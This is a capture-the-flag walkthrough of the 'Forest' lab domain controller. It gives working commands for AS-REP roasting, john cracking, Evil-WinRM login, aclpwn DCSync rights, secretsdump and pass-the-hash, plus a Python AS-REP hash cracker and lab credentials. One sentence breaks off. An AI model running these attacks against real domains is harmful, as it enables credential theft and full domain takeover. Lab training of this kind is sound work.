The first step as with most other boxes is to run nmap on the box.
nmap -sC -sV -oA nmap -v 10.10.10.161
PORT     STATE SERVICE      VERSION
53/tcp   open  domain?
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2020-02-25 11:09:14Z)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=2/25%Time=5E54FEC5%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h46m50s, deviation: 4h37m10s, median: 6m48s
| smb-os-discovery:
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: FOREST
|   NetBIOS computer name: FOREST\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: FOREST.htb.local
|_  System time: 2020-02-25T03:11:35-08:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2020-02-25T11:11:31
|_  start_date: 2020-02-24T13:09:15
From this scan we can see that we have a Windows Server 2016 box that looks like an Active Directory domain controller: Kerberos (88), LDAP (389/636) and the global catalog ports (3268/3269) are open, and LDAP reports the domain htb.local.
Given that this box is a domain controller, it is best to first add the domain name to our local hosts file so that htb.local (and the DC's FQDN, FOREST.htb.local) resolves to the target. We are not using the box's own DNS, and tools such as impacket and Kerberos clients address the DC by name.
echo "10.10.10.161 htb.local FOREST.htb.local FOREST" | sudo tee -a /etc/hosts
Using enum4linux we can pull further information about the AD configuration from the server over SMB/RPC; the scan above shows that an anonymous (guest) session is accepted, which is all enum4linux needs. From this scan we get a user list:
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
Removing the user:[ ] and rid:[ ] wrapping from each line gives a plain list of usernames, one per line, that we can pass on to other tools.
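As an added example (not part of the original walkthrough), the following Python script does that stripping programmatically: it parses the user:[..] rid:[..] lines, optionally drops the Exchange housekeeping accounts (SM_*, HealthMailbox*, $...) that are not useful targets, and writes one name per line, which is the shape GetNPUsers.py -usersfile expects. The embedded input is a constructed excerpt of the list above.

```python
import re
from pathlib import Path

# Constructed excerpt of the enum4linux user list above (not the full list).
ENUM4LINUX_USERS = """\
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[sebastien] rid:[0x479]
user:[svc-alfresco] rid:[0x47b]
"""

# One enum4linux user line: user:[<name>] rid:[0x<hex>]
USER_LINE = re.compile(r"user:\[(?P<name>[^\]]+)\]\s+rid:\[(?P<rid>0x[0-9a-fA-F]+)\]")

# Exchange creates these housekeeping accounts; they are noise for roasting.
NOISE_PREFIXES = ("SM_", "HealthMailbox", "$")


def parse_users(text):
    """Return [(name, rid)] for every 'user:[..] rid:[..]' line, in order."""
    return [(m.group("name"), int(m.group("rid"), 16))
            for m in USER_LINE.finditer(text)]


def candidate_names(users, drop_noise=True):
    """Bare usernames, with the Exchange system accounts filtered out by default."""
    names = [name for name, _rid in users]
    if drop_noise:
        names = [n for n in names if not n.startswith(NOISE_PREFIXES)]
    return names


def write_userlist(names, path):
    """One name per line, the format GetNPUsers.py -usersfile reads; returns the count."""
    Path(path).write_text("\n".join(names) + "\n")
    return len(names)


if __name__ == "__main__":
    names = candidate_names(parse_users(ENUM4LINUX_USERS))
    print(f"{write_userlist(names, 'users.txt')} users written to users.txt")
```

Run it against the full enum4linux output (or feed the saved output via read_text) and point GetNPUsers.py at the resulting users.txt; keep drop_noise=False if you want every account tried.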
Using impacket we can take the user list and look for accounts that do not require Kerberos pre-authentication (the "Do not require Kerberos preauthentication" flag on the account). For such an account the KDC answers an AS-REQ without any proof of the password, and the encrypted part of its AS-REP is keyed on the user's password hash, so it can be cracked offline (AS-REP roasting).
Using the Python script GetNPUsers.py we pass the user list to the server and get the crackable hashes in the format of our choosing (john in this case), saved to a file named Forest.hashes:
python3 GetNPUsers.py htb.local/ -usersfile /home/kali/Desktop/Forest/users.txt -format john -outputfile Forest.hashes
From the output we can see that svc-alfresco is a valid username with pre-authentication disabled, so we get a crackable hash for it.
Cracking with john
John the Ripper is an offline password cracker that tries each word of a wordlist against a hash. Using the rockyou.txt wordlist on the Forest.hashes file we should be able to crack the hash; john recognises the $krb5asrep$ format on its own.
john Forest.hashes --wordlist=/usr/share/wordlists/rockyou.txt
John should quickly find the password s3rvice for the svc-alfresco account.
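To make concrete what john is doing with a $krb5asrep$ line, here is an added Python example (not from the original post, impacket or john) that builds one the way the KDC would for an RC4-HMAC (etype 23) AS-REP and then cracks it against a small wordlist. The Kerberos key for RC4-HMAC is just the NT hash, MD4 of the UTF-16LE password with no salt, which is why these hashes crack so fast. The encrypted content (FAKE_ENC_PART) and the zero confounder are constructed placeholders; a real AS-REP carries a DER-encoded EncASRepPart and a random confounder, and the verification does not depend on either.

```python
import hmac
import hashlib
import os
import struct

MASK = 0xFFFFFFFF


def md4(data):
    """Pure-Python MD4 (RFC 1320); hashlib's md4 is disabled on many builds."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & MASK
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for i in range(16):  # round 1
            a = rotl((a + F(b, c, d) + X[i]) & MASK, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2
            k = (i % 4) * 4 + i // 4
            a = rotl((a + G(b, c, d) + X[k] + 0x5A827999) & MASK, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 3
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            a = rotl((a + H(b, c, d) + X[k] + 0x6ED9EBA1) & MASK, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a0, b0, c0, d0 = (a0 + a) & MASK, (b0 + b) & MASK, (c0 + c) & MASK, (d0 + d) & MASK
    return struct.pack("<4I", a0, b0, c0, d0)


def nt_hash(password):
    """RC4-HMAC Kerberos key == NT hash: MD4 of the UTF-16LE password, no salt."""
    return md4(password.encode("utf-16-le"))


def rc4(key, data):
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


# RFC 3961 key usage 3 (AS-REP enc-part); RFC 4757 maps it to T=8 for RC4-HMAC,
# which is the constant john/hashcat use for $krb5asrep$23$.
AS_REP_USAGE = 8


def rc4_hmac_encrypt(key, plaintext, usage=AS_REP_USAGE, confounder=None):
    """RFC 4757 encrypt: returns checksum || RC4(confounder || plaintext)."""
    ki = hmac.new(key, struct.pack("<I", usage), hashlib.md5).digest()
    data = (confounder or os.urandom(8)) + plaintext
    checksum = hmac.new(ki, data, hashlib.md5).digest()
    ke = hmac.new(ki, checksum, hashlib.md5).digest()
    return checksum + rc4(ke, data)


def rc4_hmac_verify(key, blob, usage=AS_REP_USAGE):
    """Decrypt and recompute the checksum: True only for the right key."""
    checksum, edata = blob[:16], blob[16:]
    ki = hmac.new(key, struct.pack("<I", usage), hashlib.md5).digest()
    ke = hmac.new(ki, checksum, hashlib.md5).digest()
    data = rc4(ke, edata)
    return hmac.compare_digest(hmac.new(ki, data, hashlib.md5).digest(), checksum)


def asrep_line(user, realm, blob):
    """hashcat/john layout: $krb5asrep$23$user@REALM:checksum$ciphertext."""
    return f"$krb5asrep$23${user}@{realm}:{blob[:16].hex()}${blob[16:].hex()}"


def parse_asrep_line(line):
    body = line.split("$krb5asrep$", 1)[1]
    if body.startswith("23$"):        # impacket's john output omits the etype
        body = body[3:]
    ident, rest = body.split(":", 1)
    checksum_hex, edata_hex = rest.split("$", 1)
    user, realm = ident.split("@", 1)
    return user, realm, bytes.fromhex(checksum_hex) + bytes.fromhex(edata_hex)


def crack_asrep(line, wordlist):
    """What john does per hash line: one MD4 + two HMAC-MD5 + one RC4 per guess."""
    _user, _realm, blob = parse_asrep_line(line)
    for candidate in wordlist:
        if rc4_hmac_verify(nt_hash(candidate), blob):
            return candidate
    return None


# Constructed stand-in for the AS-REP enc-part (a real one is DER-encoded EncASRepPart).
FAKE_ENC_PART = b"EncASRepPart placeholder for svc-alfresco"


def demo():
    blob = rc4_hmac_encrypt(nt_hash("s3rvice"), FAKE_ENC_PART, confounder=b"\x00" * 8)
    line = asrep_line("svc-alfresco", "HTB.LOCAL", blob)
    return crack_asrep(line, ["password", "123456", "s3rvice", "letmein"])


if __name__ == "__main__":
    print(demo())  # s3rvice
```

The cost per guess is a handful of MD5/MD4 operations, so rockyou.txt takes seconds; an account with pre-authentication enabled never hands out this blob without a valid encrypted timestamp first, which is the whole point of the flag.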
Logging in with Evil-WinRM
Port 5985 (WinRM over HTTP) is also open on the box, even though it does not appear in the scan output above. We can use Evil-WinRM to log in to the system with the cracked credentials and get a shell.
evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice -s '/home/kali/Desktop/Forest/scripts/'
Having obtained shell access, traversing to the desktop of the user reveals the
Since this box is focused on Active Directory, it is worth checking whether the domain has any configuration errors, using BloodHound to find a path to Domain Admin. To do this we need a few things first.
Download Bloodhound & SharpHound.ps1
Downloading BloodHound on Kali Linux is as easy as running
sudo apt-get install bloodhound. However you will still need to download the SharpHound.ps1 PowerShell script (the data collector), which can be acquired from the BloodHound GitHub repo.
If using another Linux distribution, follow the installation instructions on GitHub.
Before you can use BloodHound you must change the default password of the neo4j database it stores its graph in:
sudo neo4j console
- Navigate to the neo4j browser at http://localhost:7474 (its default listening address).
- Log in with the username neo4j and the default password neo4j.
- Change the password when prompted.
- Leave the neo4j service running in the background.
Evil-WinRM allows uploading and executing PowerShell scripts on the remote system.
Looking back at the connection command for Evil-WinRM we can see the flag -s '/home/kali/Desktop/Forest/scripts/'. This flag defines the directory of PowerShell scripts on your attacking machine that the session can load; set it to wherever you have saved SharpHound.ps1.
Going back to the Evil-WinRM session we logged into earlier, we can now load the SharpHound PowerShell script: type SharpHound.ps1 and hit return. After a few seconds the script will be loaded into the session.
Running the Evil-WinRM command menu will show the functions that are now available, including Invoke-BloodHound.
Invoke-BloodHound -CollectionMethod All
This will create a zip file containing the JSON files ready to be ingested into BloodHound.
To download the zip file through Evil-WinRM, simply type in download followed by the name of the zip file.
Now that we have our JSON files, and neo4j and BloodHound installed, we can begin to analyse the AD configuration.
Open BloodHound by typing bloodhound on your local machine and log in with the same credentials you set for neo4j.
Drag the downloaded zip file on to the BloodHound window to import it.
Under the Analysis tab, run the pre-built query Find Shortest Paths to Domain Admins.
This shows a diagram in which the user svc-alfresco inherits rights through nested group memberships that end at a group holding WriteDacl on the domain object. WriteDacl lets the holder modify the domain's Access Control List, and BloodHound's help for that edge explains how it can be abused: with write access to the domain's DACL we can grant an account the replication rights that allow a DCSync attack.
DC Sync Privileges & ACLPwn
To grant DCSync permissions to the user we use the aclpwn tool, which makes the necessary changes to the access control lists for us.
aclpwn reads the BloodHound data from neo4j, finds an escalation path from the source object to the target (by default the domain object), and performs each step along it, finishing by writing the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All ACEs for the account into the domain's DACL. It records every modification in a .restore file so the changes can be reverted afterwards with --restore.
aclpwn -f svc-alfresco -ft user -d htb.local -s 10.10.10.161 -u svc-alfresco -p s3rvice -du neo4j -dp kali
-f svc-alfresco  the object we are escalating
-ft user  the type of that object (a user)
-d htb.local  the domain we are attacking; the domain object is also the default target
-s 10.10.10.161  the domain controller the changes are applied on
-u svc-alfresco -p s3rvice  the credentials used to make the changes
-du neo4j -dp kali  the username and password of the neo4j database where the BloodHound data is saved (kali being the password set earlier)
svc-alfresco now has DCSync rights on the domain.
DCSync Attack & Secretsdump.py
Since our user now has DCSync privileges, we are able to extract the password hashes for the whole domain with secretsdump.py from impacket. Under the hood it asks the DC to replicate the account secrets over the Directory Replication Service (DRSUAPI), exactly as another domain controller would, which is why the two replication rights are all that is needed.
python3 secretsdump.py htb.local/svc-alfresco@10.10.10.161
Type in the password and the script will dump the password hash for every account in the domain.
We now have the NT hash of the Administrator account.
Using Evil-WinRM the hash can be passed (-H takes the NT hash; no password is needed) to log in as Administrator and obtain full system access.
evil-winrm -i 10.10.10.161 -u Administrator -H 32693b11e6aa90eb43d32c72a07ceea6
We now have full Admin privileges on the system. Traversing through the directories to the Administrator desktop we find the root.txt file.